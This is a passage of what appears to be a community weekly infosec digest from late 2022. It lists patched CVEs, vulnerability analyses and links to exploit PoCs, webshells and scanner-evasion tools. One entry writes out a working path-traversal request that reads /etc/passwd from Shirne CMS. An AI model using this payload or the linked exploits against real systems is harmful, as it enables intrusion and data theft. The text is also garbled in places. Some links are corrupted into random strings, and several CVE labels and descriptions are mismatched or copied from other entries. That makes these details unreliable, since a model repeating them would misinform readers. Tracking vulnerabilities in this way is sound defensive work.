files, gmp - Multiprecision arithmetic library developers tools, heimdal - Heimdal Kerberos Network Authentication Protocol, linux-ibm - Linux kernel for IBM cloud systems, LibreOffice, kitty, gthumb - image viewer and browser, dotnet6 - dotNET CLI tools and runtime,linux - Linux kernel,linux-aws - Linux kernel for Amazon Web Services (AWS) systems,linux-bluefield - Linux kernel for NVIDIA BlueField platforms,linux-gke - Linux kernel for Google Container Engine (GKE) systems,linux-gkeop - Linux kernel for Google Container Engine (GKE) systems, linux-hwe-5.4 - Linux hardware enablement (HWE) kernel,linux-ibm - Linux kernel for IBM cloud systems,linux-ibm-5.4 - Linux kernel for IBM cloud systems,linux-kvm - Linux kernel for cloud environments,linux-oracle - Linux kernel for Oracle Cloud systems\n\n - **Ubuntu 18.04 LTS** : unzip - De-archiver for .zip files, gmp - Multiprecision arithmetic library developers tools, heimdal - Heimdal Kerberos Network Authentication Protocol, linux-aws-5.4 - Linux kernel for Amazon Web Services (AWS) systems, linux-aws - Linux kernel for Amazon Web Services (AWS) systems, linux-gcp-4.15 - Linux kernel for Google Cloud Platform (GCP) systems, advancecomp - collection of recompression utilities,linux - Linux kernel,linux-aws - Linux kernel for Amazon Web Services (AWS) systems,linux-bluefield - Linux kernel for NVIDIA BlueField platforms,linux-gke - Linux kernel for Google Container Engine (GKE) systems,linux-gkeop - Linux kernel for Google Container Engine (GKE) systems, linux-hwe-5.4 - Linux hardware enablement (HWE) kernel,linux-ibm - Linux kernel for IBM cloud systems,linux-ibm-5.4 - Linux kernel for IBM cloud systems,linux-kvm - Linux kernel for cloud environments,linux-oracle - Linux kernel for Oracle Cloud systems.\n\n\n - **Microsoft** \n - [Weakness in Microsoft Office 365 Message Encryption could expose email contents](https://www.helpnetsecurity.com/2022/10/14/weakness-office-365-encryption/)\n - Microsoft has released updates to address multiple vulnerabilities in Microsoft software. An attacker can exploit some of these vulnerabilities to take control of an affected system.[Theres has been 55+ security that has been fixed in Microsoft products, pakage & application](https://msrc.microsoft.com/update-guide/releaseNote/2022-Oct) such as Edge (Chromium-based), Microsoft Graphics Component, Microsoft Office : Word, SharePoint, Role: Windows Hyper-V, Visual Studio Code, Microsoft WDAC OLE DB provider for SQL, NuGet Client, Remote Access Service Point-to-Point Tunneling Protocol, Active Directory Domain Services etc\n\n
\n\n
\n\nCVE Analysis, writeups & reports: (7 analysis that matter in Last 1 Week)\n \n > Every week, we collect the recetly discovered Writeups & reports for CVE. \n\n \n - [Analysis: CVE-2022-8BQAzQwVETtFWGmAFZjAwNSYA7M4EczfocpPa2kZ6AiC1tVQuAhJTRjLG5Nkk4QqFWHxiKBdi6RuUFjC5zMhvhUyK7tatMA/)\n \n - [POC CVE-2022-40684](https://github.com/horizon3ai/CVE-2022-40684)\n - [Nuclei template CVE-2022-4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV40684.yaml)\n - [Added module for CVE-2022-40684 in Metasploit framework](https://github.com/rapid7/metasploit-framework/pull/17143)\n\n - Vendor : **Fortinet**\n - Affected : FortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6 and FortiSwitchManager version 7.2.0 and 7.0.0 \n - Patched : Apply updates per vendor instructions.\n - Discription : An authentication bypass using an alternate path or channel [CWE-288] in Fortinet FortiOS , FortiProxy and FortiSwitchManager allows an unauthenticated atttacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests.\n \n - [Analysis:CVE-2022-41033](https://www.helpnetsecurity.com/2022/10/11/cve-2022-41033/)\n - Vendor : **Microsoft Products**\n - Affected : All versions of Windows starting with Windows 7 and Windows Server 2008 are vulnerable. \n - Patched : Apply updates per vendor instructions.\n - Discription : Microsoft Windows COM+ Event System Service contains an unspecified vulnerability that allows for privilege escalation.This vulnerability is considered to have a low attack complexity. It has an exploitability score of 1.8 out of four. The potential impact of an exploit of this vulnerability is considered to be very high.\n \n - [Analysis : CVE-2021-45067](https://hacksys.io/blogs/adobe-reader-xfa-ansi-unicode-confusion-information-leak) \n - [PoC : CVE-2022-36067](https://github.com/hacksysteam/CVE-2021-45067)\n \n - Target/Product: **[Acrobat Reader DC](https://get.adobe.com/reader/otherversions/)**\n - Affected Version : 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier)).\n - Discription/Issue/Flaw : Out of Bounds Read caused by treating ANSI string as Unicode in Acrobat Reader DC versions. This vulnerability can be exploited to leak sensitive information from the sandboxed adobe reader process.\n \n - [Analysis : CVE-2022-36067](https://github.com/patriksimek/vm2/security/advisories/GHSA-mrgp-mrhc-5jrq)\n - Title : [Critical vm2 sandbox escape flaw uncovered, patch ASAP!](https://www.helpnetsecurity.com/2022/10/10/cve-2022-36067/) \n - Target : **vm2 Javascript sandbox library**\n - Affected : version < 3.9.11\n - Discription : Oxeye researchers discovered a severe vm2 vulnerability (CVE-2022-36067) that has received the maximum CVSS score of 10.0. Called SandBreak, this new vulnerability requires R&D leaders, AppSec engineers, and security professionals to ensure they immediately patch the vm2 sandbox if they use it in their applications. A threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox. \n \n - [Analysis : CVE-2022-42889/ Text4Shell](https://cyberwatch-fr.translate.goog/cve/cve-2022-42889-text4shell-comment-detecter-et-corriger-cette-vulnerabilite-sur-apache-commons-text/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-GB) \n - Target/Product: **Apache Common Text** is a software component used to manipulate character strings, published by the Apache Foundation .\n - Discription/Issue/Flaw : \nCVE-2022-42889 Text4Shell: A remote code execution vulnerability in Apache Commons Text software On October 13, 2022, the Apache Foundation published a vulnerability in the code of the Apache Commons Text project and posted a message to this effect in the project's mailing list . This vulnerability closely resembles the Log4Shell CVE series , and is referenced as CVE-2022-42889. Apache Commons Text is used to check if one string contains another , or to construct messages from a preconfigured format.\n \n - [Analysis : Windows CLFS Zero-Day Vulnerability [CVE-2022-37969](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-37969) Part 1: Root Cause Analysi](https://www.zscaler.com/blogs/security-research/technical-analysis-windows-clfs-zero-day-vulnerability-cve-2022-37969-part)s \n - Target/Product: **Microsoft** \n - Discription/Issue/Flaw : \nCVE-2022-42889 Text4Shell: An attacker who successfully exploits this vulnerability may gain SYSTEM privileges. The 0-day exploit can execute the privilege escalation successfully on Windows 10 and Windows 11 prior to the September patch. The cause of the vulnerability is due to the lack of a strict bounds check on the field cbSymbolZone in the Base Record Header for the base log file (BLF) in CLFS.sys. If the field cbSymbolZone is set to an invalid offset, an out-of-bound write will occur at the invalid offset. In this two-part blog series, we will demystify the vulnerability and the 0-day exploit discovered in-the-wild. The blogs consist of two parts: an analysis of the root cause, and an analysis of the exploit. In this blog, we first present a detailed analysis of the root cause for CVE-2022-37969\n \n \n - [Detailed Report of Top CVEs most used by Chinese state-sponsored cyber actors since 2020](https://media.defense.gov/2022/Oct/06/2003092365/-1/-1/0/Joint_CSA_Top_CVEs_Exploited_by_PRC_cyber_actors_.PDF)\n \n - Summary :-> [Top CVEs most used by Chinese state-sponsored cyber actors since 2020](https://www.cisa.gov/uscert/ncas/alerts/aa22-279a)\n - Affected Vendors : \n \n \n - Discription: US authorities (NSA, FBI, CISA) expose the TOP 20 vulnerabilities actively exploited by Chinese state-sponsored attackers and NSA, CISA, and FBI urge organizations to apply the recommendations below\n \n - Update and patch systems as soon as possible. Prioritize patching vulnerabilities identified in this CSA and other known exploited vulnerabilities.\n - Utilize phishing-resistant multi-factor authentication whenever possible. Require all accounts with password logins to have strong, unique passwords, and change passwords immediately if there are indications that a password may have been compromised. \n - Block obsolete or unused protocols at the network edge. \n - Upgrade or replace end-of-life devices.\n - Move toward the Zero Trust security model. \n - Enable robust logging of Internet-facing systems and monitor the logs for anomalous activity.\n \n
\n\n
\n PoC for CVE & Exploit (Total : 5+ new 0-day matter in this week and 4 imoprtant from CVE last week) :\n \n > Every week we're tracking the recetly discovered Exploit and PoC for CVE. \n\n \n - [Poc CVE-2021-46422](https://github.com/Awei507/CVE-2021-46422)\n \n - Target/Product: **Google Chrome**\n - Affected Version: Poc maker calims \"All\" but CVE says version < 80.0.3987.149\n - Solution : google-chrome-upgrade-latest \n - Discription : Use after free in WebGL in Google Chrome prior to 80.0.3987.149 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n \n - [PoC CVE-2022-41852(unoffical)](https://github.com/Warxim/CVE-2022-41852)\n \n - Target/Product: **Apache**\n - Discription : Remote Code Execution in JXPath Library. (For example, methods JXPathContext.getValue(path) and JXPathContext.iterate(path) are dangerous if you let user send input into the path parameter.) where CVE-2022-41852 allows attackers to execute code on the application server. You can read more about this [vulnerability here:](https://hackinglab.cz/en/blog/remote-code-execution-in-jxpath-library-cve-2022-41852/)\n\n \n- Important **Poc from Last Week** :\n \n - [CVE-2022-41208-PoC](https://github.com/CronUp/Vulnerabilidades/blob/main/proxynotshell_checker.nse)\n \n - Target/Product: **Microsoft Exchage Server**\n - Affected Version: <8.3.1 \n - Discription : ProxyNotShell – CVE-2022-40140 & CVE-2022-41082. Metasploit Framework implementation of zer?-day bug in Microsoft Exchage Server which leads to RCE.\n \n - [CVE-2022-41040](https://github.com/kljunowsky/CVE-2022-41040-POC) \n - Target/Product: **Microsoft Exchage Server**\n - Discription : PoC for Microsoft CVE-2022-41040 - Server Side Request Forgery (SSRF) in Microsoft Exchange Server. \n - [Zeroday Microsoft Exchange Server checker (Virtual Patching checker)](https://github.com/VNCERT-CC/0dayex-checker) \n \n - [PS5-4.03-Kernel-Exploit](https://github.com/Cryptogenic/PS5-4.03-Kernel-Exploit)\n - Target/Product: **PS5**\n - Exploit support firmwares : 4.03, 4.50, 4.51\n - Discription/Issue/Flaw : ??PS5 kernel exploit based on TheFlow's IPV6 Use-After-Free (UAF), which was reported on HackerOne. The exploit strategy is for the most part based on TheFlow's BSD/PS4 PoC with some changes to accommodate the annoying PS5 memory layout (for more see Research Notes section). It establishes an arbitrary read / (semi-arbitrary) write primitive. This exploit and its capabilities have a lot of limitations, and as such, it's mostly intended for developers to play with to reverse engineer some parts of the system.\n \n - [DropBox-XPC-Exploit](https://github.com/Pwnrin/DropBox-XPC-Exploit)\n - Target/Product: **Dropbox**\n - Discription/Issue/Flaw : ??DropBox-XPC-Exploit (https://github.com/Pwnrin/DropBox-XPC-Exploit) is a exploit for PID Reuse and Logical Error in DropBox's XPC service.\n \n
\n\n---\n\n## CVE's that matter : [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 27th Sept-11th October 2022\n\n\n\n \n Security Patched within a Week: # Latest vulnerability that has been patched within last two week (12th Oct - 18th October 2022). \n featuring releases from Microsoft, Adove, Github, Cisco, Linux(Ubuntu, kali etc), Firefox etc.\n\n CVE:ANALYSIS & POC: Cve-2022-34960, cve-2022-41218, HackerOne report #1672388- Gitlab, cve-2022–33987, \n Cve-2022–36635 and Detailed Report of Top cves most used by Chinese state-sponsored cyber actors since 2020 \n\n \n CVE POC (0-Day): Zeroday Microsoft Exchange Server checker (Virtual Patching checker), DropBox-XPC-Exploit, \n Cve Collection of jQuery UI XSS Payloads, nuclei-templete for cve-2022–35405, An updated list of PoC's cve's, \n \n PS5-4.03-Kernel-Exploit, cve-2022-41040, cve-2022-26726, cve-2022-30600, cve-2022-39197, cve-2021-29156 Exploit, \n Cve-2022-30206, cve-2022-2992, cve-2022-41208, cve-2022-2274 and cve-2022-36804\n\n---\n\n\n## CVE's that matter : [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 21th Sept-27th Sept 2022\n\n \n Security Patched within a Week: Latest vulnerability that has been patched within a week(21th Sep-27th Sep 2022). \n featuring releases from Apple, Google, Microsoft, Github, Linux(Ubuntu, kali etc), wordpress etc.\n \n CVE:ANALYSIS & POC: CVE-2022-39197, CVE-2022-36934, CVE-2022-27492, CVE-2022-40286, cve-2021-41653, CVE-2022-39205, CVE-2022-39206, CVE-2022-39207 & CVE-2022-39208.\n \n CVE POC (0-Day): CVE-2022-39197, CVE-2022-36804, CVE-2022-30206, CVE-2022-28282, CVE-2022-34729, Cronos poc, \n CVE-2022-23743, Webshell - Open source project, Windows10 - Custom Kernel Signers.\n \t\n
\n\nSecurity Patched within a Week: \n\n- Here’s a look at the Latest Security (Severity : Critical or High) that has been patched in a Week(21th Sep-27th Sep 2022) and We highly recommend upgrading or updating from the origional source. \n \n- **WhatsApp** Security Advisories September Update : CVE-2022-36934(prior to v2.22.16.12) and CVE-2022-27492(prior to v2.22.16.2).\n- **Node.js** Update Fixes High Severity Flaws : CVE-2022-32212, CVE-2022-32215 & CVE-2022-35256. (Affected v18.x, v16.x, and v14.x )\n- Several security issues were fixed in the different version of **Ubuntu** Linux kernel pakages.\n - **Ubuntu 22.04** : bind9, mako, tiff, linux-gkeop, python-oauthlib, linux-oem-5.17, linux-gcp, linux-gke, linux-raspi - Li, etc.\n - **Ubuntu 20.04 LTS** & Ubuntu 18.04 LTS*: bind9, mako, tiff, libjpeg-turbo, vim, xen, etcd, linux-hwe-5.15/5.4, linux-lowlatency-hwe-5.15/5.4, linux, linux-aws, linux-aws-5.15/5.4 , linux-azure, linux-azure-5.15/5.4 , linux-kvm, linux-bluefield, linux-gkeop, linux-ibm, linux-ibm-5.4, linux-oracle, linux-oracle-5.4.\n\n - **Microsoft** [Endpoint Configuration Manager Spoofing Vulnerability](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-37972)\n- **Cisco** [NX-OS Software Border Gateway Protocol Denial of Service Vulnerability](https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180620-nxosbgp?vs_f=Cisco%20Security%20Advisory&vs_cat=Security%20Intelligence&vs_type=RSS&vs_p=Cisco%20NX-OS%20Software%20Border%20Gateway%20Protocol%20Denial%20of%20Service%20Vulnerability&vs_k=1)\n- **Mozilla** Releases Security Updates for [Firefox 105](https://www.mozilla.org/en-US/security/advisories/mfsa2022-40/), [Firefox ESR 102.3](https://www.mozilla.org/en-US/security/advisories/mfsa2022-41/), [Thunderbird 102.3](https://www.mozilla.org/en-US/security/advisories/mfsa2022-42/) & [Thunderbird 91.13.1](https://www.mozilla.org/en-US/security/advisories/mfsa2022-39/).\n- **Jenkins** [Security Advisory 2022-09-21](https://www.jenkins.io/security/advisory/2022-09-21/).\n- **Zoho** [ManageEngine Multiple Products Remote Code Execution Vulnerability CVE-2022-35405(CVSS score 9.8)](https://socprime.com/blog/cve-2022-35405-detection-cisa-warns-of-adversaries-leveraging-manageengine-rce-flaw/)\n- **Sophos** [Firewall Code Injection Vulnerability CVE-2022-3236](https://www.helpnetsecurity.com/2022/09/26/cve-2022-3236/)\n- **IBM** [Maximo Asset Management 7.6.1.1, 7.6.1.2, and 7.6.1.3 (CVE-2022-40616)](https://nvd.nist.gov/vuln/detail/CVE-2022-40616) \n- **Adobe** [Bridge version 12.0.2 (and earlier) and 11.1.3 (and earlier) are affected by a Heap-based Buffer Overflow vulnerability](https://helpx.adobe.com/security/products/bridge/apsb22-49.html)\n\n
\n\n
\n\nCVE Analysis & PoC(9):\n\n\n - [Analysis: CVE-2022-39197](https://securityonline.info/cve-2022-39197-critical-cobalt-strike-bug-could-lead-to-rce-attacks/)\n \n - Title -> Critical Cobalt Strike bug could lead to RCE attacks.\n - [PoC CVE-2022-39197](https://github.com/burpheart/cve-2022-39197)\n - Affected Version : prior to 4.7.1.\n - Discription/Issue/Flaw : The CVE-2022-39197 vulnerability exists in Cobalt Strike’s Beacon payload, which may allow an attacker to trigger XSS by setting a fake username in the Beacon configuration, thereby causing remote code execution on the CS Server.\n \n - [Analysis: CVE-2022-36934 and CVE-2022-27492](https://nakedsecurity.sophos.com/2022/09/27/whatsapp-zero-day-exploit-news-scare-what-you-need-to-know/)\n - Title -> WhatsApp “zero-day exploit” news scare – what you need to know\n - Affected Version : Android prior to v2.22.16.12, Business for Android < v2.22.16.12, iOS < v2.22.16.12, Business for iOS < v2.22.16.12\n - Discription/Issue/Flaw : CVE-2022-36934 (An integer overflow in version v2.22.16.12 could result in remote code execution in an established video call.) & CVE-2022-27492 (An integer underflow in v2.22.16.2 could have caused remote code execution when receiving a crafted video file.) \n \n - [Analysis: CVE-2022-39205, CVE-2022-39206, CVE-2022-39207 & CVE-2022-39208](https://blog.sonarsource.com/onedev-remote-code-execution/)\n - Title -> Securing Developer Tools: **OneDev** Remote Code Execution.\n - Affected Version : 7.2.9.\n - Discription/Issue/Flaw : OneDev tool has various features such as code search, CI/CD and static code analysis and it is an alternative to GitHub, GitLab and Bitbucket and it is open text. In this article paul gerste discussed mentioned CVE ID.\n \n - [Analysis: CVE-2022-40286](https://www.x86matthew.com/view_post?id=windows_seagate_lpe)\n - Title -> Exploiting a Seagate service to create a SYSTEM shell.\n - Target & Affected Version : Seagate Media Sync.\n - Discription/Issue/Flaw : OneDev tool has various features such as code search, CI/CD and static code analysis and it is an alternative to GitHub, GitLab and Bitbucket and it is open text. In this article paul gerste discussed mentioned CVE ID.\n \n - [Analysis : cve-2021-41653](https://k4m1ll0.com/cve-2021-41653.html)\n - [cve-2021-41653 video Poc](https://www.youtube.com/watch?v=GBuuGdeTKgw&feature=youtu.be)\n - Target/Product: **TP-Link**\n - Title: : TP-Link TL-WR840N EU v5 Remote Code Execution.\n - Discription/Issue : The goal was to achieve remote code execution on a TP-LINK TL-WR840N EU (V5) router. According to its papers, this version came out in 2017 and in case you're still susing the old version then we highly recommend upgrading the firmware to the latest version \"TL-WR840N(EU)_V5_211109\". It can be downloaded from the vendor homepage. \n\n
\n\n
\n CVE PoC, shell & Exploit (9) :\n\n \n \n - [CVE-2022-39197 Poc](https://github.com/Wh04m1001/ZoneAlarmEoP)\n - Target/Product: **Cobalt Strike**\n - Discription/Issue/Flaw : CVE-2022-39197 Cobalt Strike XSS vulnerability patch. Disable html support for swing by hooking the isHTMLString method of javax.swing.plaf.basic.\n \n - [CVE-2022-36804-PoC](https://github.com/notxesh/CVE-2022-36804-PoC) \n - Target/Product: **Atlassian Bitbucket **\n - Affected Version: <8.3.1 \n - Discription : The script will automatically detect public repositories located on bitbucket instances then select a random repository to check or perform the vulnerability on. If there are no public repositories a valid 'BITBUCKETSESSIONID' cookie is required in order to exploit known vulnerable instances. The PoC was designed to take multiple input hosts and pipe vulnerable hosts to stdout allowing for piping of results in order to be processed by other tools.\n \n -[CVE-2022-30206](https://github.com/Pwnrin/CVE-2022-30206) \n - Target/Product: **Microsoft**\n - Discription : PoC for Microsoft CVE-2022-30206: Windows Print Spooler Elevation of Privilege Vulnerability.\n \n - [CVE-2022-28282](https://github.com/Pwnrin/CVE-2022-28282)\n - Target/Product: **Firefox**\n - Discription/Issue/Flaw : PoC for CVE-2022-28282 Firefox: heap-use-after-free in DocumentL10n::TranslateDocument.\n \n - [CVE-2022-34729](https://github.com/Pwnrin/CVE-2022-34729)\n - Target/Product: **NorthSea**\n - Discription/Issue/Flaw : NorthSea decided to delay the disclosure of this POC for some reason.\n\n - [Cronos poc](https://github.com/Idov31/Cronos)\n - Discription : PoC for a new sleep obfuscation technique (based on [Ekko](https://github.com/Cracked5pider/Ekko)) leveraging waitable timers to RC4 encrypt the current process and change the permissions from RW to RX to evade memory scanners.\n \n \n - [CVE-2022-23743 Poc](https://github.com/Wh04m1001/ZoneAlarmEoP)\n - Target/Product: **Check Point's ZoneAlarm antivirus**\n - Affected Version: < 15.8.211.19229\n - Discription/Issue/Flaw : Exploit for Arbitrary File Move vulnerability in ZoneAlarm AV.\n \n \n - [Webshell - Open source project](https://github.com/tennc/webshell) \n - Discription : Scripts that enable threat actors to compromise web servers and launch additional attacks. This project covers a variety of commonly used scriptsSuch as: asp, aspx, php, jsp, pl, py. NOTE : This project is only for testing, and all the consequences have nothing to do with authors.\n \n - [Windows10 - Custom Kernel Signers](https://github.com/HyperSine/Windows10-CustomKernelSigners ) \n - Discription : Load self-signed drivers without TestSigning or disable DSE. \n \n
\n---\n\n## CVE's that matter [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 14th September - 20th September 2022\n\n \n Security Patched : Latest IT security vulnerability patched within this week on selected company such as Whatsapp, Apple, Google, \n Google, Microsoft, Github, Linux(Ubuntu, kali etc), wordpress etc. \n \n CVE:ANALYSIS & POC: CVE-2022-32883 Analysis: Turning Your Computer Into a GPS Tracker With Apple Maps. \n \n \n CVE POC : CVE-2022-32548 RCE, CVE-2022-2588, CVE-2022-34721, CVE-2022-36804, CVE-2022-34709, \n CVE-2022-33980, CVE-2019-2215 & GwisinMsi poc based on Recreating an MSI Payload for Fun and no profit blog. \n\n
\n\n#### Security patched within a Week.(Trail)\n \n - Apple iOS, iPadOS, and macOS Remote Code Execution Vulnerability CVE-2022-32917\n - Code Aurora ACDB Audio Driver Stack-based Buffer Overflow Vulnerability CVE-2013-2597\n - Linux Kernel \n - Improper Input Validation Vulnerability CVE-2013-6282\n - Integer Overflow Vulnerability CVE-2013-2596\n - Privilege Escalation Vulnerability CVE-2013-2094\n - Github packages :\n - Multiple *Tensorflow(< 2.10.0)Packages*(tensorflow, tensorflow-cpu, tensorflow-gpu) are vulnerable to \n CHECK fail & segfault that can be used to trigger a denial of service attack.\n - oauthlib/oauthlib package (>=3.1.1) vulnerable to DoS when attacker provide malicious IPV6 URI.\n - In reactphp/http package (>= 0.7.0, < 1.7.0), when ReactPHP is processing incoming HTTP cookie values, the cookie names are url-decoded. This may lead to cookies with prefixes like __Host- and __Secure- confused with cookies that decode to such prefix, thus leading to an attacker being able to forge cookie which is supposed to be secure. and It has been Fixed in reactphp/http v1.7.0.\n \n - Microsoft Windows Common Log File System (CLFS) Driver Privilege Escalation Vulnerability CVE-2022-37969\n - Microsoft Windows Remote Code Execution Vulnerability CVE-2010-2568\n - Trend Micro Apex One and Apex One as a Service Improper Validation Vulnerability CVE-2022-40139\n \n #### CVE Analysis & poc\n \n - [CVE-2022-32883 Analysis: Turning Your Computer Into a GPS Tracker With Apple Maps](https://breakpoint.sh/posts/turning-your-computer-into-a-gps-tracker-with-apple-maps)\n - [CVE-2022-32883 Poc](https://github.com/breakpointHQ/CVE-2022-32883)\n - Target/Product: **Apple Maps**\n - Patched : Update your devices running iOS and iPadOS to iOS 15.7/16 and iPadOS 15.7 and macOS Monterey to 12.6.\n - Discription/Issue : Ron Masses found and disclosed 2 vulnerabilities in Apple Maps that allowed him to extract the accurate location of the user without authorization.\n \n - [GwisinMsi poc](https://github.com/ChoiSG/GwisinMsi)\n - Title: PoC MSI payload based on ASEC/AhnLab's blog - [Recreating an MSI Payload for Fun and no profit](https://blog.sunggwanchoi.com/recreating-a-msi-payload-for-fun-and-no-profit/)\n - Target/Product: **MSI**\n - Discription/Issue : The payload is based on the [Gwisin ransomware's MSI payload analysis of the AhnLab ASEC team's blog post](https://asec.ahnlab.com/en/37483/).\n \n - [CVE-2022-2588 Poc](https://github.com/sang-chu/CVE-2022-2588)\n - Target/Product: **Linux kernel**\n - Discription/Issue: Linux kernel cls_route UAF\n \n \n - [CVE-2022-34721 poc](https://github.com/78ResearchLab/PoC/tree/main/CVE-2022-34721)\n - Title: Windows Internet Key Exchange (IKE) Protocol Extension Remote Code Execution.\n - Target/Product: **Windows Internet Key Exchange (IKE)**\n - Discription/Issue: The 3 vulnerabilities related to IKE Extension was patched on Patch Tuesday in September 2022. One of the vulnerabilities was found during IKE related research, which was patched by Yuki Chen.\n \n - [CVE-2022-36804 PoC](https://github.com/CEOrbey/CVE-2022-36804-MASS-RCE)\n - Target/Product: **Atlassian Bitbucket Server and Data Center**\n - Affected Version: All versions of Bitbucket Server and Data Center released before versions 7.6.17, 7.17.10, 7.21.4, 8.0.3, 8.1.2, 8.2.2, and 8.3.1 are vulnerable.\n - Discription/Issue : A critical vulnerability (CVE-2022-36804) in Atlassian Bitbucket Server and Data Center could be exploited by unauthorized attackers to execute malicious code on vulnerable instances.\n \n \n - [CVE-2022-34709 poc](https://bugs.chromium.org/p/project-zero/issues/detail?id=2301)\n - Title: **Windows: Credential Guard ASN1 Decoder Type Confusion EoP**\n - Discription/Issue : A number of Kerberos CG APIs do not verify the ASN1 PDU type when decoding and encoding Kerberos ASN1 structures leading to type confusion and elevation of privilege. and window patched this CVE-2022-34709 - [Windows Defender Credential Guard Security Feature Bypass Vulnerability](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34709) with new version.\n\n \n - [CVE-2022-33980 poc](https://github.com/HKirito/CVE-2022-33980) \n - Target/Product: **Apache**\n - Affected Version: 2.4 through 2.7\n - Discription/Issue: Apache Commons RCE can use url,dns,script key-words to connect any server\n \n - [CVE-2019-2215 poc](https://github.com/ameetsaahu/Kernel-exploitation/tree/main/CVE-2019-2215)\n - Target/Product: **Linux kernel**\n - Affected Version: >= 4.14\n - Discription/Issue: Exploit for bad binder CVE-2019-2215 on x86_64 Android.\n \n
\n \n---\n
\n \n\nCVE's that matter [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 07th Sept - 13th Sept 2022\n\n CVE POC : CVE02022-22629 MacOS, CVE-2022-37706, CVE-2022-40297, CVE-2022-34169, CVE-2022-20128, CVE-2022-20360, CVE-2022-27925, \n CVE-2022-37299,CVE-2022-25260, Chaining CVE-2021-42278 and CVE-2021-42287. \n \n CVE Analysis : Latest IT security vulnerability patched on selected company such as Apple, Google, Microsoft, Github, \n Linux(Ubuntu, kali etc) & D-Link & CVE-2022-34169, CVE-2022-31474 Wordpress, \n \n Exploit : Mobile Mouse 3.6.0.4 Remote Code Execution, \n\n \n \n### CVE PoC :\n - [CVE-2022-22629 MacOS PoC](https://github.com/parsdefense/CVE-2022-22629)\n \n - Target & Affected Version: **MacOS - Safari <15.4**\n - Discription/Issue : This poc for the WebGL( A javascript API that is used in browsers to render 2D and 3D graphics.) bug that was patched in Safari 15.4 security updates.\n \n - [CVE-2022-37706 PoC](https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit)\n \n - Target & Affected Version: **Ubuntu 22.04 & Distro**\n - Discription/Issue : A reliable exploit + write-up to elevate privileges to root. (Tested on Ubuntu 22.04) \n \n - [CVE-2022-40297 PoC](https://github.com/filipkarc/PoC-ubuntutouch-pin-privesc)\n \n - Target & Version : **Ubuntu Touch 16.04**\n - Title : Privilage escalation in Ubuntu Touch 16.04 - by PIN Bruteforce\n - Description : Ubuntu Touch allows you to \"protect\" devices with a 4-digit passcode. Such a code was set in a demonstration device. The problem is that the same 4-digit passcode then becomes a password that we can use with the sudo command and gain root privileges. This means that a malicious application can do us double harm:\n 1. Easily escalate privileges and take control of the device.\n 2. It can pass the screen unlock passcode to a third party.\n\n - [CVE-2022-20128 PoC](https://github.com/irsl/CVE-2022-20128)\n \n - Target : **Android Debug Bridge (adb) - directory traversal**\n - Description : Android Debug Bridge (adb) was vulnerable to directory traversal attacks that could have been mounted by rogue/compromised adb daemons during an adb pull operation.\n\n - [CVE-2022-20360 Poc](https://github.com/nidhi7598/packages_apps_Settings_AOSP_10_r33_CVE-2022-20360)\n - Target : **Android setChecked LPE**\n\n - [CVE-2022-27925 Poc](https://github.com/mohamedbenchikh/CVE-2022-27925)\n \n - Target & Patched Version : **Zimbra released a patched on 8.8.15P31 and 9.0.0P24.**\n - Title : Zimbra Unauthenticated Remote Code Execution Exploit.\n - Description : CVE-2022-27925 was originally listed as an RCE exploit requiring authentication. When combined with a separate bug, however, it became an unauthenticated RCE exploit that made remote exploitation trivial.\n \n - [CVE-2022-37299 Poc](https://vulners.com/cve/CVE-2022-37299)\n \n - Target & Version: **Shirne CMS 1.2.0. Path Traversal**\n - PoC: GET /static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=/etc/passwd&maxwidth=-1&referer=test:\n GET /static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=/etc/passwd&maxwidth=-1&referer=test\n \n - [Chainning CVE-2021-42278 and CVE-2021-42287 PoC](https://github.com/Ridter/noPac)\n - Discription/Issue : Exploiting [CVE-2021-42278 and CVE-2021-42287](https://4sysops.com/archives/exploiting-the-cve-2021-42278-samaccountname-spoofing-and-cve-2021-42287-deceiving-the-kdc-active-directory-vulnerabilities/) to impersonate DA from standard domain user. \n\n - [CVE-2022-25260](https://github.com/yuriisanin/CVE-2022-25260)\n \n - Target & Patched Version : **JetBrains Hub <2021.1.14276**\n - Title : JetBrains Hub pre-auth semi-blind server-side request forgery (SSRF).\n \n - Description : JetBrains Hub before 2021.1.14276 was vulneable to improper access control (CVE-2022-34894), which allows an attacker create untrusted services without authentication even if guest user is disabled. This makes it possible to exploit the vulnerablity without any other requirements (normally an attacker should be at least authenticated). The vulnerability was possible due to use of Apache Batik with default settings for user-supplied SVG icon rasterization.\n \n### CVE Analysis : \n- This is a trail segment where we're experimenting the idea to track and filter out IT professional essential software and We're planning to provide CVE update for selected company such as Apple, Google, Microsoft, Github, Android, Linux(Ubuntu, kali etc), D-Link and CVE listed on Nation Cyber Awareness System. Let me know the if you have suggestion or want to add your favorite company this list.\n\n - Vulnerability in NVIDIA Data Plane Development Kit Affecting Cisco Products(Cisco Catalyst 8000V Edge Software, Adaptive Security Virtual Appliance (ASAv) & Secure Firewall Threat Defense Virtual (formerly FTDv))\n - Apple iOS, iPadOS, and macOS Input Validation Vulnerability CVE-2020-9934\n - Oracle WebLogic Server Unspecified Vulnerability 